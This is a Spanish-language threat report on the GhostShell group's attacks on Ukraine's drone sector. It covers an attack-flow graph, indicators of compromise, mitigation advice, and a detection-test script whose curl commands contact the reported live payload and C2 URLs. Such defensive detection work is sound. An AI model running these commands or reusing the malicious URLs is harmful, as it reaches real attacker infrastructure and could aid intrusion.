GhostShell (MB-0009): Apuntando a las Operaciones de UAV de Ucrania y la Cadena de Suministro de Defensa

SOC Prime Team

Seguir

GhostShell (MB-0009): Apuntando a las Operaciones de UAV de Ucrania y la Cadena de Suministro de Defensa

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

Un grupo de amenazas recientemente rastreado conocido como GhostShell está apuntando al ecosistema de UAV y drones de Ucrania. La operación utiliza malware avanzado, incluidos implantes autenticados por mTLS y cargadores residentes en memoria. Para obtener acceso inicial, los atacantes se basan en documentos señuelo que se hacen pasar por una empresa de drones ucraniana.

Investigación

El analista descubrió una cadena de intrusión de múltiples etapas construida alrededor de scripts VBS, implantes habilitados para mTLS como 122.exe, y cargadores basados en Telegram, incluyendo update.exe. La ingeniería inversa expuso lógica de descifrado XOR personalizada, un PKI privado incrustado, y el uso de Xray Core para tunelización encubierta. La investigación también identificó actividad de infostealer Vidar dentro de la misma infraestructura.

Mitigación

Las organizaciones deben hacer cumplir la validación estricta de certificados mTLS y monitorear el uso no autorizado de certificados de cliente. La visibilidad de puntos finales debe mejorarse para detectar carga en memoria, desenganche de ntdll.dll , y cambios sospechosos en la persistencia de claves Run de Windows. Los equipos también deben vigilar el tráfico saliente anormal hacia dominios de comando y control conocidos y la recuperación de configuración impulsada por Telegram.

Respuesta

Los sistemas afectados deben aislarse inmediatamente, seguido de análisis forense de memoria para identificar cualquier implante en memoria. Los registros de red deben revisarse en busca de tráfico que involucre a cloudaxis.cc and cdnexpress.cc. Los equipos de seguridad también deben buscar los hashes SHA-256 referenciados y monitorizar el certificado específico de cliente mTLS CN=ed6e62814295701f.

"graph TB %% Definición de Clases classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 classDef operator fill:#ff9900 %% Fase de Acceso Inicial y Ejecución action_phishing["Acción – T1566.001 Phishing: Attachamento de Spearphishing Descripción: Ingeniería social utilizando documentos PDF señuelo haciéndose pasar por Besomar para apuntar al ecosistema UAV."] class action_phishing action action_exploit["Acción – T1203 Explotación para Ejecución de Cliente Descripción: Explotando CVE-2025-8088 y CVE-2025-6218 a través del archivo malicioso Besomar_documentation.rar."] class action_exploit action process_vbs["Proceso – T1059.005 Intérprete de Comando y Scripts: Visual Basic Descripción: Archivo VBS insertado en la carpeta de Inicio ejecutando cadenas codificadas en Base64 mediante ExecuteGlobal."] class process_vbs process %% Persistencia y Descarga de Cargas Útiles action_persistence_startup["Acción – T1547.001 Ejecución Autoiniciada de Arranque o Inicio de Sesión: Claves de Ejecución del Registro / Carpeta de Inicio Descripción: Archivo VBS colocado en la carpeta de Inicio para persistencia."] class action_persistence_startup action network_download["Red – T1105 Transferencia de Herramienta de Ingreso Descripción: Descargando cargas útiles secundarias de cloudaxis.cc."] class network_download network op_branch(("AND")) class op_branch operator %% Ruta 1: 122.exe malware_122["Nombre: 122.exe Descripción: Cargador que descifra un PE incrustado usando XOR y lo ejecuta en memoria."] class malware_122 malware action_fingerprint["Acción: Huella Digital del Host Descripción: Recolectando nombre del equipo, nombre de usuario, y PID."] class action_fingerprint action network_c2_122["Comunicación C2: cdnexpress.cc Descripción: Utiliza un certificado de cliente mTLS único para autenticación."] class network_c2_122 network action_screen_cap["Acción: Captura de Pantalla Descripción: Capturando pantallas mediante GDI+."] class action_screen_cap action action_persistence_reg["Acción: Claves del Registro de Ejecución Descripción: Estableciendo persistencia mediante claves de Ejecución del Registro de Windows."] class action_persistence_reg action %% Ruta 2: update.exe malware_update["Nombre: update.exe Descripción: Cargador en memoria que recupera configuración C2 desde Telegram."] class malware_update malware action_anti_analysis["Acción: T1562.001 Deterioro de Defensas: Desactivar o Modificar Herramientas Descripción: Desenganchando herramientas de EDR/monitorización mediante parches de ntdll.dll."] class action_anti_analysis action action_metasploit_stager["Acción: T1059.003 Intérprete de Comando y Scripts: Shell de Comando de Windows Descripción: Ejecuta un preparador HTTPS al estilo Metasploit en memoria."] class action_metasploit_stager action %% Ruta 3: 22.exe y Vidar malware_22["Nombre: 22.exe Descripción: Lanzador de múltiples etapas que utiliza el cliente Xray Core."] class malware_22 malware network_vless["Red: T1573 Canal Encriptado Descripción: Tunelización de tráfico a través de una conexión VLESS."] class network_vless network malware_vidar["Nombre: Malware Vidar Descripción: Herramienta de robo de credenciales y datos que apunta a contraseñas de navegadores , cookies, billeteras y artefactos de mensajería."] class malware_vidar malware %% Lógica de Conexión action_phishing –>|lleva a| action_exploit action_exploit –>|resulta en| process_vbs process_vbs –>|usa| action_persistence_startup action_persistence_startup –>|desencadena| network_download network_download –>|entrega| op_branch %% Ramas a cargas útiles op_branch –>|payload_1| malware_122 op_branch –>|payload_2| malware_update op_branch –>|payload_3| malware_22 %% Flujo de 122.exe malware_122 –>|realiza| action_fingerprint malware_122 –>|comunica con| network_c2_122 malware_122 –>|capable of| action_screen_cap malware_122 –>|asegura| action_persistence_reg %% Flujo de update.exe malware_update –>|recupera configuración de| action_anti_analysis action_anti_analysis –>|ejecuta| action_metasploit_stager %% Flujo de 22.exe malware_22 –>|tuneliza a través de| network_vless network_vless –>|despliega| malware_vidar "

Flujo de Ataque

Narrativa & Comandos de Ataque: El adversario ha obtenido un punto de apoyo inicial y está intentando descargar una carga útil especializada (122.exe) para solidificar el control sobre el objetivo. Para mantener un perfil bajo, el malware utiliza un dominio CDN aparentemente legítimo o secuestrado (cloudaxis.cc). Después de la descarga, el malware intenta «latir» o enviar telemetría de regreso a la infraestructura C2 a través de un punto final específico de análisis (cdnexpress.cc/analytics). La simulación utilizará curl para imitar estas solicitudes GET específicas para desencadenar la lógica de detección basada en URI.

Script de Prueba de Regresión:

# Simulación de Descarga de Carga Útil de GhostShell
Write-Host "[+] Simulando Descarga de Carga Útil de GhostShell..."
curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/ushu/122.exe"

# Simulación de Comunicación C2 de GhostShell (Análisis)
Write-Host "[+] Simulando Comunicación C2 de GhostShell..."
curl.exe -I "https://cdnexpress.cc/analytics"

Comandos de Limpieza:

# No se descargan archivos en esta simulación (utilizando -I solo para cabeceras)
# No se realizan cambios persistentes en el sistema.
Write-Host "[+] Simulación completa. No se requiere limpieza."

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis